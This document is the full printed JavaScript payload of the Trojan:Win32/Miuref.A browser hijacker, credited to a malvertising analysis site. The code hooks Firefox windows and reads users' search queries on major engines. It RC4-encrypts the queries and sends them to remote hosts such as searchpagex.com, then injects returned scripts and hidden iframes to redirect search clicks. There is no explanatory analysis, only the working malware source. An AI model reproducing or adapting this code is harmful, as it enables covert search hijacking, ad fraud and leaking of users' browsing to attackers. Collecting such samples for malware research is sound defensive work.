Trojan:Win32/Miuref.A - MicrosoftDirectInputObject.js

1. # Analysis of Trojan:Win32/Miuref.A
2. # http://stopmalvertising.com/malware-reports/analysis-of-trojan-win32-miuref-a.html
3.  
4. MicrosoftDirectInputObject.js
5.  
6. "
7. {
8. "e": 0, "c": "(function()
9. {
10. function Q(a,c)
11. {
12. try
13. {
14. var b=y[z+\"xmlextras/xmlhttprequest;
15. 1\"].createInstance(k.nsIXMLHttpRequest);
16. b.timeout=6E4;
17. b.open(\"GET\",a,!0);
18. b.overrideMimeType(\"text/plain;
19. charset=x-user-defined\");
20. b.onreadystatechange=function()
21. {
22. try
23. {
24. 4==b.readyState&&c(b.responseText,b.status,b)
25. }
26. catch(a)
27. {
28.  
29. }
30.  
31. }
32. ;b.send(null)
33. }
34. catch(d)
35. {
36.  
37. }
38.  
39. }
40. function D(a,c)
41. {
42. var b=[],d,e,f,g;
43. for(d=0;
44. 256>d;
45. d++)b[d]=d;
46. for(d=e=0;
47. 256>d;
48. d++)e=(e+b[d]+c.charCodeAt(d%c.length))%256,f=b[d],b[d]=b[e],b[e]=f;
49. d=e=0;
50. var q=\"\";
51. for(g=0;
52. g<a.length;
53. g++)d=(d+\n1)%256,e=(e+b[d])%256,f=b[d],b[d]=b[e],b[e]=f,q+=String.fromCharCode(a.charCodeAt(g)^b[(b[d]+b[e])%256]);
54. return q
55. }
56. function r()
57. {
58. this.c=[]
59. }
60. function x(a)
61. {
62. try
63. {
64. return a.QueryInterface(k.nsIInterfaceRequestor).getInterface(k.nsIWebNavigation).QueryInterface(k.nsIDocShellTreeItem).rootTreeItem.QueryInterface(k.nsIInterfaceRequestor).getInterface(k.nsIDOMWindow)
65. }
66. catch(c)
67. {
68.  
69. }
70.  
71. }
72. function E()
73. {
74. return y[z+\"observer-service;
75. 1\"].getService(k.nsIObserverService)
76. }
77. function F(a)
78. {
79. try
80. {
81. var c=x(a.target.ownerDocument.defaultView.top).gBrowser,\nb=c.getBrowserForTab(a.target),d=c.selectedBrowser.contentDocument,e=c.getBrowserForDocument(d);
82. b.b=d.location.href;
83. b.a=e.a;
84. e.a=\"\"
85. }
86. catch(f)
87. {
88.  
89. }
90.  
91. }
92. function G(a)
93. {
94. try
95. {
96. for(var c=a.target;
97. c&&(\"A\"!=c.nodeName||!c.href);
98. )c=c.parentNode;
99. if(c)
100. {
101. var b=c.ownerDocument,d=this.getBrowserForDocument(b);
102. d.b=b.defaultView.location.href;
103. d.a=c.href
104. }
105.  
106. }
107. catch(e)
108. {
109.  
110. }
111.  
112. }
113. function R(a)
114. {
115. try
116. {
117. var c=this.gBrowser;
118. if(c)
119. {
120. var b=a.originalTarget.ownerDocument,d=c.getBrowserForDocument(b);
121. d.b=b.location.href;
122. d.a=b.location.href
123. }
124.  
125. }
126. catch(e)
127. {
128.  
129. }
130.  
131. }
132. \nfunction H(a)
133. {
134. a.addEventListener(I,J,!1);
135. var c=a.gBrowser;
136. c.tabContainer.addEventListener(\"TabOpen\",F,!1);
137. c.addEventListener(K,G,!0);
138. a.addEventListener(\"submit\",R,!0)
139. }
140. function L(a)
141. {
142. try
143. {
144. a.removeEventListener(I,J,!1)
145. }
146. catch(c)
147. {
148.  
149. }
150. a=a.gBrowser;
151. a.tabContainer.removeEventListener(\"TabOpen\",F,!1);
152. a.removeEventListener(K,G,!0)
153. }
154. function J(a)
155. {
156. try
157. {
158. L(a.originalTarget.defaultView)
159. }
160. catch(c)
161. {
162.  
163. }
164.  
165. }
166. function C(a)
167. {
168. try
169. {
170. var c=a.originalTarget.defaultView;
171. c.removeEventListener(\"load\",C,!1);
172. if(c.opener)
173. {
174. var b=c.opener.gBrowser,\nd=b.contentDocument,e=d.location.href,f=b.getBrowserForDocument(d),g=c.gBrowser;
175. if(!g)return;
176. var q=g.selectedBrowser;
177. q.b=e;
178. q.a=f.a;
179. f.a=\"\"
180. }
181. H(c)
182. }
183. catch(k)
184. {
185.  
186. }
187.  
188. }
189. function M(a)
190. {
191. var c=y[z+\"embedcomp/window-watcher;
192. 1\"].getService(k.nsIWindowWatcher);
193. try
194. {
195. for(var b=c.getWindowEnumerator();
196. b.hasMoreElements();
197. )
198. {
199. var d=b.getNext().QueryInterface(k.nsIDOMWindow);
200. try
201. {
202. a(d,\"complete\"==d.document.readyState)
203. }
204. catch(e)
205. {
206.  
207. }
208.  
209. }
210.  
211. }
212. catch(f)
213. {
214.  
215. }
216.  
217. }
218. function S()
219. {
220. M(function(a,c)
221. {
222. c&&(a.gBrowser?H(a):a.addEventListener(\"load\",C,!1))
223. }
224. )
225. }
226. function T()
227. {
228. M(function(a,\nc)
229. {
230. c&&(a.gBrowser?L(a):a.removeEventListener(\"load\",C,!1))
231. }
232. )
233. }
234. function A()
235. {
236.  
237. }
238. var y=Components.classes,k=Components.interfaces,K=\"click\",I=\"unload\",z=\"@mozilla.org/\";
239. r.prototype=
240. {
241. addListener:function(a)
242. {
243. this.j(a)||this.c.push(a)
244. }
245. ,removeListener:function(a)
246. {
247. a=this.g(a);
248. 0<=a&&this.c.splice(a,1)
249. }
250. ,g:function(a)
251. {
252. for(var c=this.c,b=0;
253. b<c.length;
254. ++b)if(c[b]==a)return b;
255. return-1
256. }
257. ,j:function(a)
258. {
259. return-1!=this.g(a)
260. }
261. ,o:function()
262. {
263. return 0<this.c.length
264. }
265. ,d:function()
266. {
267. try
268. {
269. for(var a=this.c,c=[],b=0;
270. b<a.length;
271. ++b)
272. {
273. var d=\na[b];
274. if(\"function\"==typeof d)try
275. {
276. var e=d.apply(this,arguments);
277. \"undefined\"!=typeof e&&c.push(e)
278. }
279. catch(f)
280. {
281.  
282. }
283.  
284. }
285. return c
286. }
287. catch(g)
288. {
289.  
290. }
291.  
292. }
293.  
294. }
295. ;var N=new r,U=new r,O=new r,P=new r;
296. (function()
297. {
298. function a(a)
299. {
300. window.l||(window.l=1,stop(),window.setTimeout(function()
301. {
302. var m=document.createElement(\"iframe\");
303. m.src=a;
304. if(document.body)document.body.appendChild(m);
305. else
306. {
307. var b=document.createElement(\"body\");
308. b.style.display=\"none\";
309. var c=document.childNodes[0];
310. c.appendChild(b);
311. c.childNodes[0].appendChild(m)
312. }
313.  
314. }
315. ,0))
316. }
317. function c(a,\nm)
318. {
319. var b=JSON.stringify(
320. {
321. q:a,p:m,t:u
322. }
323. );
324. return p[s]+btoa(D(b,\"http\"))
325. }
326. function b(a)
327. {
328. if(a=v(a))
329. {
330. var m=a[2],b=a[1];
331. n[b]||(n[b]=
332. {
333. h:Math.floor((new Date).getTime()/1E3),f:
334. {
335.  
336. }
337. ,i:
338. {
339.  
340. }
341.  
342. }
343. ,Q(c(b,m),function(a,m)
344. {
345. if(200==m)
346. {
347. var B=D(atob(a),u);
348. n[b].f=JSON.parse(B)
349. }
350. else s+=1,s>=p.length&&(s=0)
351. }
352. ));
353. return b
354. }
355.  
356. }
357. function d(b,m,c)
358. {
359. if(m&&(c=v(c))&&!(c[0]>=w.length))
360. {
361. m=c[1];
362. c=w[c[0]][1];
363. var d=b;
364. c&&(d=c(b));
365. if(d&&x.exec(d))try
366. {
367. var e=Math.floor((new Date).getTime()/1E3),f;
368. for(f in n)try
369. {
370. n[f].h&&n[f].h+6E5<e&&delete n[f]
371. }
372. catch(h)
373. {
374.  
375. }
376. if(n[m])
377. {
378. var k,\ng=n[m];
379. if(g.f&&!g.i[b]&&(g.i[b]=1,k=g.f.u.shift()))return\"(\"+a.toString()+\")('\"+k+\"')\"
380. }
381.  
382. }
383. catch(p)
384. {
385.  
386. }
387.  
388. }
389.  
390. }
391. function e(a)
392. {
393. var b,c=
394. {
395.  
396. }
397. ,d=a.split(\"&\");
398. for(b in d)a=d[b].split(\"=\"),c[a[0]]=a[1];
399. return c
400. }
401. function f(a)
402. {
403. if(a)
404. {
405. for(var b=h.exec(a),c=0;
406. c<t.length;
407. ++c)if(-1!=b[1].toLowerCase().indexOf(\".\"+t[c]+\".\"))return;
408. return a
409. }
410.  
411. }
412. function g(a)
413. {
414. try
415. {
416. var b=h.exec(a);
417. if(-1==b[1].toLowerCase().indexOf(\".ask.\"))return f(a);
418. if(\"/r\"==b[2]&&b[3])
419. {
420. var c=e(b[3]),d=unescape(c.zu?c.zu:c.u);
421. return g(\"/\"==d.charAt(0)?b[0]+d:d)
422. }
423.  
424. }
425. catch(k)
426. {
427.  
428. }
429.  
430. }
431. \nfunction q(a)
432. {
433. try
434. {
435. var b=h.exec(a);
436. if(-1==b[1].toLowerCase().indexOf(\".google.\"))return f(a);
437. if(\"/aclk\"==b[2])return a;
438. if(\"/url\"==b[2]&&b[3])
439. {
440. var c=e(b[3]),d=c.url,d=unescape(d?d:c.q);
441. return q(\"/\"==d.charAt(0)?b[0]+d:d)
442. }
443.  
444. }
445. catch(g)
446. {
447.  
448. }
449.  
450. }
451. function k(a)
452. {
453. try
454. {
455. var b;
456. if((b=h.exec(a))&&-1==b[1].toLowerCase().indexOf(\".aol.com\"))return f(a)
457. }
458. catch(c)
459. {
460.  
461. }
462.  
463. }
464. function r(a,b)
465. {
466. for(var c=0;
467. c<a.length;
468. ++c)if(b(a[c]))return!0;
469. return!1
470. }
471. function v(a)
472. {
473. if(a=h.exec(a))for(var b=a[1].toLowerCase(),c=a[2].toLowerCase(),d=0;
474. d<w.length;
475. ++d)
476. {
477. var f=\nw[d];
478. if(-1!=b.indexOf(f[2]))
479. {
480. if(r(f[3],function(a)
481. {
482. return a==c
483. }
484. )||r(f[4],function(a)
485. {
486. return 0<=c.indexOf(a)
487. }
488. ))if(b=
489. {
490.  
491. }
492. ,f[6]&&a[4]?b=e(a[4]):a[3]&&(b=e(a[3])),f[5]in b)return[d,escape(unescape(b[f[5]].replace(/\\+/g,\" \"))),f[0]];
493. break
494. }
495.  
496. }
497.  
498. }
499. var n=
500. {
501.  
502. }
503. ,u=\"\";
504. N.addListener(function(a)
505. {
506. u=a;
507. O.addListener(b);
508. P.addListener(d)
509. }
510. );
511. var p=[\"http://searchpagex.com/s?q=\",\"http://searchpagex.org/s?q=\"],s=Math.floor(Math.random()*p.length),h=/^https?:\\/\\/(.*?)(\\/[^\\?#]*)(?:\\?([^#]*))?(?:#(.*))?/i,x=/^https?\\:\\/\\//i,t=\"google facebook youtube yahoo amazon wikipedia ebay gmail twitter craigslist linkedin live go pinterest bing tumblr paypal aol cnn netflix weather apple imgur imdb zedo nytimes microsoft walmart yelp wellsfargo comcast foxnews hulu myspace reddit pandora reference\".split(\" \"),\nw=[[0,q,\".google.\",[\"/webhp\",\"/gen_204\",\"/search\",\"/\"],[],\"q\",!0],[1,function(a)
512. {
513. try
514. {
515. var b;
516. if((b=h.exec(a))&&-1==b[1].toLowerCase().indexOf(\".bing.\"))return f(a)
517. }
518. catch(c)
519. {
520.  
521. }
522.  
523. }
524. ,\".bing.\",[\"/search\"],[],\"q\",!1],[2,function(a)
525. {
526. try
527. {
528. var b;
529. if(b=h.exec(a))
530. {
531. var c=b[1].toLowerCase(),d=b[2].toLowerCase();
532. if(-1!=c.indexOf(\".yahoo.\"))
533. {
534. if(0!=d.indexOf(\"/r/\"))return;
535. a=unescape(a.substr(a.indexOf(\"**http\")+2))
536. }
537. return f(a)
538. }
539.  
540. }
541. catch(e)
542. {
543.  
544. }
545.  
546. }
547. ,\".yahoo.\",[],[\"/search\"],\"p\",!1],[3,k,\".aol.com\",[],[\"/search\"],\"q\",!1],[3,k,\".aol.ca\",\n[],[\"/search\"],\"q\",!1],[4,g,\".ask.com\",[\"/web\"],[],\"q\",!1],[6,function(a)
548. {
549. try
550. {
551. var b;
552. if((b=h.exec(a))&&-1==b[1].toLowerCase().indexOf(\"avg.com\"))return f(a)
553. }
554. catch(c)
555. {
556.  
557. }
558.  
559. }
560. ,\"search.avg.com\",[\"/search\"],[],\"q\",!0],[9,function(a)
561. {
562. try
563. {
564. var b;
565. if((b=h.exec(a))&&-1==b[1].toLowerCase().indexOf(\".mywebsearch.com\"))return f(a)
566. }
567. catch(c)
568. {
569.  
570. }
571.  
572. }
573. ,\".mywebsearch.com\",[],[\"ggmain.jhtml\",\"ggweb.jhtml\"],\"searchfor\",!1],[15,function(a)
574. {
575. try
576. {
577. var b;
578. if((b=h.exec(a))&&-1==b[1].toLowerCase().indexOf(\".search-results.com\"))return f(a)
579. }
580. catch(c)
581. {
582.  
583. }
584.  
585. }
586. ,\n\".search-results.com\",[\"/web\"],[],\"q\",!1],[18,function(a)
587. {
588. try
589. {
590. var b;
591. if((b=h.exec(a))&&-1==b[1].toLowerCase().indexOf(\"comcast.net\"))return f(a)
592. }
593. catch(c)
594. {
595.  
596. }
597.  
598. }
599. ,\"search.comcast.net\",[\"/\"],[],\"q\",!1],[23,null,\".delta-search.com\",[\"/\"],[],\"q\",!1]]
600. }
601. )();
602. A.prototype=
603. {
604. m:function()
605. {
606. var a=E();
607. a.addObserver(this,\"toplevel-window-ready\",!1);
608. a.addObserver(this,\"http-on-examine-response\",!1);
609. a.addObserver(this,\"content-document-global-created\",!1);
610. S()
611. }
612. ,n:function()
613. {
614. var a=E();
615. a.removeObserver(this,\"toplevel-window-ready\");
616. \na.removeObserver(this,\"http-on-examine-response\");
617. a.removeObserver(this,\"content-document-global-created\");
618. T()
619. }
620.  
621. }
622. ;A.prototype.observe=function(a,c,b)
623. {
624. switch(c)
625. {
626. case \"toplevel-window-ready\":a.addEventListener(\"load\",C,!1);
627. break;
628. case \"http-on-examine-response\":try
629. {
630. if(a)
631. {
632. var d=a.QueryInterface(k.nsIHttpChannel),e=x(d.notificationCallbacks);
633. !e&&d.loadGroup&&(e=x(d.loadGroup.notificationCallbacks));
634. if(e)
635. {
636. var f=e.content.document,g=e.gBrowser;
637. if(g)
638. {
639. var q=g.getBrowserForDocument(f);
640. if(q.e)
641. {
642. var r=d.responseStatus;
643. \nif(\"4\"==r[0]||\"5\"==r[0])q.e=0,f.location=q.k
644. }
645. else O.d(d.name)
646. }
647.  
648. }
649.  
650. }
651.  
652. }
653. catch(t)
654. {
655.  
656. }
657. break;
658. case \"content-document-global-created\":if(b&&\"null\"!=b)try
659. {
660. var v=a.top;
661. if(a==v)
662. {
663. var n=v.document,u=x(v).gBrowser;
664. u||(u=x(v).wrappedJSObject.gBrowser);
665. if(u)
666. {
667. var p=u.getBrowserForDocument(n);
668. if(p)
669. {
670. var s=a.document.referrer,h=v.location.href;
671. \"about:blank\"==h&&(h=\"\");
672. var y=p.b,z=p.a;
673. h&&(p.a=\"\");
674. p.e=0;
675. s||z||(p.b=\"\");
676. s?p.a=\"\":s=z;
677. if(h&&s&&y)
678. {
679. p.b=\"\";
680. var w=P.d(h,s,y);
681. if(w&&w.length)
682. {
683. p.e=1;
684. p.k=h;
685. var n=a.document,B=n.documentElement,\nm=B?B:n.createElement(\"html\");
686. m.innerHTML='<html><head><title>Connecting...</title></head><body style=\"display:none\"></body></html>';
687. B||n.appendChild(m);
688. n.getElementsByTagName(\"head\");
689. var A=n.createElement(\"script\");
690. A.innerHTML=\"(function()
691. {
692. try
693. {
694. \"+w.join(\"
695. }
696. catch(e)
697. {
698.  
699. }
700. ;try
701. {
702. \")+\"
703. }
704. catch(e)
705. {
706.  
707. }
708.  
709. }
710. ())\";
711. m.appendChild(A)
712. }
713.  
714. }
715.  
716. }
717.  
718. }
719.  
720. }
721.  
722. }
723. catch(D)
724. {
725.  
726. }
727.  
728. }
729.  
730. }
731. ;var t;
732. return[function(a)
733. {
734. N.d(a);
735. t=new A;
736. t.m()
737. }
738. ,function()
739. {
740. t&&(t.n(),t=null);
741. U.d()
742. }
743. ]
744. }
745. )();
746. \n", "u": ["http://search-page.net", "http://search-direct.net", "http://searchtop.org"], "v": 4
747. }
748. "